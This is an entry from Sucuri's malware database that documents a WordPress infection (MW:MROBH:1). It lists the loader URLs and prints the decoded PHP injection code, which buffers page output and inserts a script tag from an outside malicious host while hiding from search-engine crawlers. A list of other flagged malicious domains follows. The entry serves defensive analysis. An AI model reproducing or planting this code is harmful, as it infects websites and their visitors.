Sucuri Security


Sucuri Malware database

Name:

MW:MROBH:1

Description: Code used to insert a malicious javascript on many wordpress sites. Loading the malware from: http://www.indesignstudioinfo.com/ls.php http://zettapetta.com/js.php http://zettapetta.com/js2.php http://holasionweb.com/oo.php http://www.losotrana.com/js.php Generally infecting the footer.php (or all PHP files in some cases). Clean up:: Run the following script: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html Malware dump (base 64 added to the .php files): Decoded dump: if(!function_exists('mrobh')) { if(!function_exists('gml')) { function gml() { if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return '<script src="http://indesignstudioinfo.com/ls.php"></script>'; } return ""; } } if(!function_exists('gzdecode')) { function gzdecode($var1) { $var3=@ord(@substr($var1,3,1)); $var2=10; if($var3&4) { $var4=@unpack('v',substr($var1,10,2)); $var4=$var4[1]; $var2+=2+$var4; } if($var3&8) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&16) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&2) { $var2+=2; } $var5=@gzinflate(@substr($var1,$var2)); if($var5===FALSE) { $var5=$var1; } return $var5; } } function mrobh($var6) { Header('Content-Encoding: none'); $var7=gzdecode($var6); if(preg_match('/\<\/body/si',$var7)) { return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7); } else { return $var7.gml(); } } ob_start('mrobh'); } }
Latest modified entries:
MW:RKS:3 (aeaaea.com, uoauer.com)
MW:JS:152 (illmoney.ru)
MW:JS:222 (crocro.biz)
MW:IFRAME:HD187 (rkmceylon.org)
MW:JS:512 (lopzzi.servemp3.com)
MW:JS:152 (nuttypiano.com)
MW:SPAM:S8 (gberbhjerfds.osa.pl)
MW:JS:152 (pocketbloke.ru, chickcase.ru)
MW:SPAM:S8 (p3p0.com)
MW:MROBH:3 (nowisisdudescars.com)
MW:JS:222 (pqshow.org, prshow.org)
MW:BLUEH:2 (vancouvererrorsonfile.com)
MW:JS:222 (myads.name, adsnet.biz)
MW:JS:222 (toolbar.com.or, mybar.us)
MW:JS:222 (freead.name)
MW:B64:21 (mybloknot.com)
MW:RKS:3 (ae.awaue.com, ao.euuaw.com)
MW:RKS:3 (ie.eracou.com)
MW:HTA:7 (fgnfdfthrv.bee.pl)
MW:IFRAME:EIUE (eiueuiuewi.com)
MW:IFRAME:TIOCP (tiocp.info)
MW:JS:443 (watess.info)
MW:JS:442 (vderukmvfds.com)
MW:MROBH:3 (whereisdudescars.com)
MW:HTA:3 (natebennettfleming.com)
MW:HTA:4 (redrt.org.in)
MW:BLUEH:1
MW:JS:221
MW:JS:151 (new port 8080 malware)
MW:HIGHCLASS:1 (highclassv.net)
MW:JS:245
MW:JS:YADR0 (yadr0.com)
MW:OSCOM:1 (nt02.co.in)
MW:IOPAP:1 (iopap.upperdarby26.com)
MW:IFRAME:HD31
MW:IFRAME:HD207
MW:IIS:3 (robint-us hack)
MW:MROBH:2 (GoDaddy hack)
MW:IFRAME:HD21 (imageshacks.net)
MW:IFRAME:HD22
MW:IFRAME:HD54 (yahoo-statistic.com)
MW:SPAM:S2 (mass SEO spam)
MW:MROBH:1 (Wordpress hack)
MW:JS:GEN2
MW:JS:KDJK (GoDaddy mass hack 05/2010)
MW:JS:150
MW:JS:MAINNET (Netsol mass hack 05/2010)
MW:JS:205 (Netsol mass hack 04/2010)
MW:JS:199
MW:GREPADD:2 (Netsol mass hack 04/2010)
MW:JS:203
MW:JS:233
MW:JS:207
MW:IFRAME:GCOUNTER (gcounter.cn)
MW:IFRAME:HD321
MW:JS:66 (WP footer.php malware)